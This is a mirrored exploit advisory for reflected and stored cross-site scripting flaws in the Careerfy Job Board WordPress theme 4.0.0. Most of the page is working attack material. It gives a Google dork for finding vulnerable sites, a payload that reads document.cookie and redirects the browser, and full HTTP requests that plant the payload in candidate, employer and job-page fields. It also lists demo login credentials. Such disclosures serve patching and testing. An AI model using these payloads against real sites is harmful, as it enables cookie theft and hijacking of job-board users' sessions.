Advertisement






Careerfy - Job Board WordPress Theme v4.0.0 - Multiple Vulnerabilities

CVE Category Price Severity
CVE-2020-5815 CWE-79 $500 High
Author Risk Exploitation Type Date
Exploit Alert Team High Remote 2020-07-18
CPE
cpe:cpe:/a:careerfy:job_board_wordpress_theme:4.0.0
CVSS EPSS EPSSP
CVSS:4.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H 0.02192 0.50148

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2020070091

Below is a copy:

Careerfy - Job Board WordPress Theme v4.0.0 - Multiple Vulnerabilities
[+] Exploit Title: Careerfy - Job Board WordPress Theme v4.0.0 - Multiple Vulnerabilities
[+] Google Dork: inurl:/wp-content/themes/careerfy/
[+] Date: 2020-07-05
[+] Exploit Author: Vlad Vector [ https://vladvector.ru ]
[+] Vendor: Eyecix [ http://eyecix.com ]
[+] Software Version: 4.0.0
[+] Software Link: https://themeforest.net/item/careerfy-job-board-wordpress-theme/21137053
[+] Tested on: Debian 10
[+] CVE: 
[+] CWE: CWE-79



### [ Info: ]

[i] An Unauthenticated Reflected & Multiple Authenticated Persistent XSS vulnerabilities was discovered in the Careerfy Job Board theme v4.0.0 for WordPress.

[i] An Authenticated Persistent XSS @ Job Page will trigger on the dashboard area /user-dashboard/?tab=manage-jobs and on the job page itself.

[i] Demo account #1 (Candidate @ Careerfy PetCare): vladvector / DJKNFU#$&H#IUFD (login / password)

[i] Demo account #2 (Employer @ Careerfy Job Board): vladvector / DJKNFU#$&H#IUFD (login / password)

[i] Candidate @ PetCare profile URL: https://careerfy.net/petcare/candidate/vladvector/

[i] Employer @ Job Board profile URL: https://careerfy.net/careerbooster/employer/vladvector/

[i] Employer @ Job Board job URL: https://careerfy.net/careerbooster/job/poc-2/



### [ Vulnerabilities: ]

[x] Unauthenticated Reflected XSS -> /?sector_cat=[payload]

[x] Authenticated Persistent XSS -> Candidate Profile (vulnerable field: Full Address)

[x] Authenticated Persistent XSS -> Employer Profile (vulnerable fields: Dial Code, Full Address)

[x] Authenticated Persistent XSS -> Job Page (vulnerable field: Full Address)



### [ Payload: ]

[$] 1"--><!--<img src="-->"><img src=x onerror=alert(`VL?DV?CTOR`);alert(document.cookie);window.location=`https://themeforest.net/user/vladvector`;>



### [ PoC Unauthenticated Reflected XSS: ]

[!] https://careerfy.net/careerbooster/jobs-listing/?sector_cat=1%22--%3E%3C!--%3Cimg%20src=%22--%3E%22%3E%3Cimg%20src=x%20onerror=alert(`VL?DV?CTOR`);alert(document.cookie);window.location=`https://themeforest.net/user/vladvector`;%3E

[!] GET /careerbooster/jobs-listing/?sector_cat=1%22--%3E%3C!--%3Cimg%20src=%22--%3E%22%3E%3Cimg%20src=x%20onerror=alert(`VL?DV?CTOR`);alert(document.cookie);window.location=`https://themeforest.net/user/vladvector`;%3E HTTP/1.1
Host: careerfy.net



### [ PoC Authenticated Persistent XSS -> Candidate User Profile: ]

[!] POST /petcare/user-dashboard/?tab=dashboard-settings HTTP/1.1
Host: careerfy.net
Content-Type: multipart/form-data; boundary=---------------------------42351733583489166030977870308
Content-Length: 4754
Origin: https://careerfy.net
Referer: https://careerfy.net/petcare/user-dashboard/?tab=dashboard-settings
Cookie: [cookies_here]

-----------------------------42351733583489166030977870308
Content-Disposition: form-data; name="user_cvr_photo_cand"; filename=""
Content-Type: application/octet-stream


-----------------------------42351733583489166030977870308
Content-Disposition: form-data; name="u_firstname"

Vlad
-----------------------------42351733583489166030977870308
Content-Disposition: form-data; name="u_lastname"

Vector
-----------------------------42351733583489166030977870308
Content-Disposition: form-data; name="user_profile_slug"

vladvector
-----------------------------42351733583489166030977870308
Content-Disposition: form-data; name="jobsearch_field_user_public_pview"

yes
-----------------------------42351733583489166030977870308
Content-Disposition: form-data; name="jobsearch_field_user_dob_whole"


-----------------------------42351733583489166030977870308
Content-Disposition: form-data; name="user_phone"


-----------------------------42351733583489166030977870308
Content-Disposition: form-data; name="dial_code"


-----------------------------42351733583489166030977870308
Content-Disposition: form-data; name="contry_iso_code"


-----------------------------42351733583489166030977870308
Content-Disposition: form-data; name="user_sector"

39
-----------------------------42351733583489166030977870308
Content-Disposition: form-data; name="jobsearch_field_candidate_jobtitle"

Vlad Vector
-----------------------------42351733583489166030977870308
Content-Disposition: form-data; name="candidate_salary_type"

type_1
-----------------------------42351733583489166030977870308
Content-Disposition: form-data; name="candidate_salary"


-----------------------------42351733583489166030977870308
Content-Disposition: form-data; name="candidate_salary_currency"

default
-----------------------------42351733583489166030977870308
Content-Disposition: form-data; name="candidate_salary_pos"

left
-----------------------------42351733583489166030977870308
Content-Disposition: form-data; name="candidate_salary_sep"

,
-----------------------------42351733583489166030977870308
Content-Disposition: form-data; name="candidate_salary_deci"

2
-----------------------------42351733583489166030977870308
Content-Disposition: form-data; name="user_bio"


-----------------------------42351733583489166030977870308
Content-Disposition: form-data; name="academic-level"

masters-degree
-----------------------------42351733583489166030977870308
Content-Disposition: form-data; name="Age"

23` -- 27-years
-----------------------------42351733583489166030977870308
Content-Disposition: form-data; name="salary"

31337
-----------------------------42351733583489166030977870308
Content-Disposition: form-data; name="gender"

male1
-----------------------------42351733583489166030977870308
Content-Disposition: form-data; name="industry"

hack' -- ing
-----------------------------42351733583489166030977870308
Content-Disposition: form-data; name="cand_user_facebook_url"


-----------------------------42351733583489166030977870308
Content-Disposition: form-data; name="cand_user_twitter_url"


-----------------------------42351733583489166030977870308
Content-Disposition: form-data; name="cand_user_linkedin_url"


-----------------------------42351733583489166030977870308
Content-Disposition: form-data; name="cand_user_dribbble_url"


-----------------------------42351733583489166030977870308
Content-Disposition: form-data; name="jobsearch_field_location_location1"


-----------------------------42351733583489166030977870308
Content-Disposition: form-data; name="jobsearch_field_location_location2"


-----------------------------42351733583489166030977870308
Content-Disposition: form-data; name="jobsearch_field_location_location3"


-----------------------------42351733583489166030977870308
Content-Disposition: form-data; name="jobsearch_field_location_address"

1"--><!--<img src="-->"><img src=x onerror=alert(`VL?DV?CTOR`);alert(document.cookie);window.location=`https://themeforest.net/user/vladvector`;>
-----------------------------42351733583489166030977870308
Content-Disposition: form-data; name="jobsearch_field_location_lat"

37.090240
-----------------------------42351733583489166030977870308
Content-Disposition: form-data; name="jobsearch_field_location_lng"

-95.712891
-----------------------------42351733583489166030977870308
Content-Disposition: form-data; name="jobsearch_field_location_zoom"

12
-----------------------------42351733583489166030977870308
Content-Disposition: form-data; name="user_settings_form"

1
-----------------------------42351733583489166030977870308--



### [ PoC Authenticated Persistent XSS -> Employer Profile: ]

[!] POST /careerbooster/user-dashboard/?tab=dashboard-settings HTTP/1.1
Host: careerfy.net
Content-Type: multipart/form-data; boundary=---------------------------22074218576675900842109481301
Content-Length: 5617
Origin: https://careerfy.net
Referer: https://careerfy.net/careerbooster/user-dashboard/?tab=dashboard-settings
Cookie: [cookies_here]

-----------------------------22074218576675900842109481301
Content-Disposition: form-data; name="user_cvr_photo"; filename=""
Content-Type: application/octet-stream


-----------------------------22074218576675900842109481301
Content-Disposition: form-data; name="u_firstname"

Vlad
-----------------------------22074218576675900842109481301
Content-Disposition: form-data; name="u_lastname"

Vector
-----------------------------22074218576675900842109481301
Content-Disposition: form-data; name="display_name"

Vlad Vector
-----------------------------22074218576675900842109481301
Content-Disposition: form-data; name="user_profile_slug"

vladvector
-----------------------------22074218576675900842109481301
Content-Disposition: form-data; name="jobsearch_field_user_public_pview"

yes
-----------------------------22074218576675900842109481301
Content-Disposition: form-data; name="user_phone"


-----------------------------22074218576675900842109481301
Content-Disposition: form-data; name="dial_code"

1"--><!--<img src="-->"><img src=x onerror=alert(`VL?DV?CTOR`);alert(document.cookie);window.location=`https://themeforest.net/user/vladvector`;>
-----------------------------22074218576675900842109481301
Content-Disposition: form-data; name="contry_iso_code"


-----------------------------22074218576675900842109481301
Content-Disposition: form-data; name="user_website"


-----------------------------22074218576675900842109481301
Content-Disposition: form-data; name="user_sector"

34
-----------------------------22074218576675900842109481301
Content-Disposition: form-data; name="user_dob_mm"

7
-----------------------------22074218576675900842109481301
Content-Disposition: form-data; name="user_dob_dd"

5
-----------------------------22074218576675900842109481301
Content-Disposition: form-data; name="user_dob_yy"

2020
-----------------------------22074218576675900842109481301
Content-Disposition: form-data; name="user_bio"


-----------------------------22074218576675900842109481301
Content-Disposition: form-data; name="founded-since"


-----------------------------22074218576675900842109481301
Content-Disposition: form-data; name="emp_user_facebook_url"


-----------------------------22074218576675900842109481301
Content-Disposition: form-data; name="emp_user_twitter_url"


-----------------------------22074218576675900842109481301
Content-Disposition: form-data; name="emp_user_linkedin_url"


-----------------------------22074218576675900842109481301
Content-Disposition: form-data; name="emp_user_dribbble_url"


-----------------------------22074218576675900842109481301
Content-Disposition: form-data; name="jobsearch_field_location_location1"


-----------------------------22074218576675900842109481301
Content-Disposition: form-data; name="jobsearch_field_location_location2"


-----------------------------22074218576675900842109481301
Content-Disposition: form-data; name="jobsearch_field_location_location3"


-----------------------------22074218576675900842109481301
Content-Disposition: form-data; name="jobsearch_field_location_address"

1"--><!--<img src="-->"><img src=x onerror=alert(`VL?DV?CTOR`);alert(document.cookie);window.location=`https://themeforest.net/user/vladvector`;>
-----------------------------22074218576675900842109481301
Content-Disposition: form-data; name="jobsearch_field_location_lat"

37.090240
-----------------------------22074218576675900842109481301
Content-Disposition: form-data; name="jobsearch_field_location_lng"

-95.712891
-----------------------------22074218576675900842109481301
Content-Disposition: form-data; name="jobsearch_field_location_zoom"


-----------------------------22074218576675900842109481301
Content-Disposition: form-data; name="team_image"; filename=""
Content-Type: application/octet-stream


-----------------------------22074218576675900842109481301
Content-Disposition: form-data; name="jobsearch_field_team_title[]"


-----------------------------22074218576675900842109481301
Content-Disposition: form-data; name="jobsearch_field_team_designation[]"


-----------------------------22074218576675900842109481301
Content-Disposition: form-data; name="jobsearch_field_team_experience[]"


-----------------------------22074218576675900842109481301
Content-Disposition: form-data; name="team_image"; filename=""
Content-Type: application/octet-stream


-----------------------------22074218576675900842109481301
Content-Disposition: form-data; name="jobsearch_field_team_image[]"


-----------------------------22074218576675900842109481301
Content-Disposition: form-data; name="jobsearch_field_team_facebook[]"


-----------------------------22074218576675900842109481301
Content-Disposition: form-data; name="jobsearch_field_team_google[]"


-----------------------------22074218576675900842109481301
Content-Disposition: form-data; name="jobsearch_field_team_twitter[]"


-----------------------------22074218576675900842109481301
Content-Disposition: form-data; name="jobsearch_field_team_linkedin[]"


-----------------------------22074218576675900842109481301
Content-Disposition: form-data; name="jobsearch_field_team_description[]"


-----------------------------22074218576675900842109481301
Content-Disposition: form-data; name="user_settings_form"

1
-----------------------------22074218576675900842109481301
Content-Disposition: form-data; name="terms_cond_check"

on
-----------------------------22074218576675900842109481301--



### [ PoC Authenticated Persistent XSS -> Job Page: ]

[!] POST /careerbooster/user-dashboard/?tab=user-job HTTP/1.1
Host: careerfy.net
Content-Type: multipart/form-data; boundary=---------------------------2947472569940564910711066421
Content-Length: 4254
Origin: https://careerfy.net
Referer: https://careerfy.net/careerbooster/user-dashboard/?tab=user-job
Cookie: [cookies_here]

-----------------------------2947472569940564910711066421
Content-Disposition: form-data; name="job_title"

PoC
-----------------------------2947472569940564910711066421
Content-Disposition: form-data; name="job_detail"

PoC
-----------------------------2947472569940564910711066421
Content-Disposition: form-data; name="application_deadline"

15-07-2020 19:04:42
-----------------------------2947472569940564910711066421
Content-Disposition: form-data; name="job_sector"

34
-----------------------------2947472569940564910711066421
Content-Disposition: form-data; name="job_type"

20
-----------------------------2947472569940564910711066421
Content-Disposition: form-data; name="get_job_skills[]"


-----------------------------2947472569940564910711066421
Content-Disposition: form-data; name="job_apply_type"


-----------------------------2947472569940564910711066421
Content-Disposition: form-data; name="job_apply_url"


-----------------------------2947472569940564910711066421
Content-Disposition: form-data; name="job_apply_email"


-----------------------------2947472569940564910711066421
Content-Disposition: form-data; name="job_salary_type"

type_1
-----------------------------2947472569940564910711066421
Content-Disposition: form-data; name="job_salary"


-----------------------------2947472569940564910711066421
Content-Disposition: form-data; name="job_max_salary"


-----------------------------2947472569940564910711066421
Content-Disposition: form-data; name="job_salary_currency"

default
-----------------------------2947472569940564910711066421
Content-Disposition: form-data; name="job_salary_pos"

left
-----------------------------2947472569940564910711066421
Content-Disposition: form-data; name="job_salary_sep"

,
-----------------------------2947472569940564910711066421
Content-Disposition: form-data; name="job_salary_deci"

2
-----------------------------2947472569940564910711066421
Content-Disposition: form-data; name="offered-salary"

31337
-----------------------------2947472569940564910711066421
Content-Disposition: form-data; name="career-level"


-----------------------------2947472569940564910711066421
Content-Disposition: form-data; name="experience"

2-years
-----------------------------2947472569940564910711066421
Content-Disposition: form-data; name="gender"

male
-----------------------------2947472569940564910711066421
Content-Disposition: form-data; name="Industry"


-----------------------------2947472569940564910711066421
Content-Disposition: form-data; name="qualifications"

hacking\ 'skills
-----------------------------2947472569940564910711066421
Content-Disposition: form-data; name="job_attach_files[]"; filename=""
Content-Type: application/octet-stream


-----------------------------2947472569940564910711066421
Content-Disposition: form-data; name="jobsearch_field_location_location1"


-----------------------------2947472569940564910711066421
Content-Disposition: form-data; name="jobsearch_field_location_location2"


-----------------------------2947472569940564910711066421
Content-Disposition: form-data; name="jobsearch_field_location_location3"


-----------------------------2947472569940564910711066421
Content-Disposition: form-data; name="jobsearch_field_location_address"

1"--><!--<img src="--><img src=x onerror=(alert)(document.cookie)//">1 "><svg/onload=';alert(`VL?DV?CTOR`);window.location=`https://twitter.com/vlad_vector`;'>
-----------------------------2947472569940564910711066421
Content-Disposition: form-data; name="jobsearch_field_location_lat"

37.090240
-----------------------------2947472569940564910711066421
Content-Disposition: form-data; name="jobsearch_field_location_lng"

-95.712891
-----------------------------2947472569940564910711066421
Content-Disposition: form-data; name="jobsearch_field_location_zoom"

12
-----------------------------2947472569940564910711066421
Content-Disposition: form-data; name="user_job_posting"

1
-----------------------------2947472569940564910711066421
Content-Disposition: form-data; name="terms_cond_check"

on
-----------------------------2947472569940564910711066421--



### [ Contacts: ]

[#] Website: vladvector.ru
[#] Telegram: @vladvector
[#] Twitter: @vlad_vector
[#] GitHub: @vladvector

Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.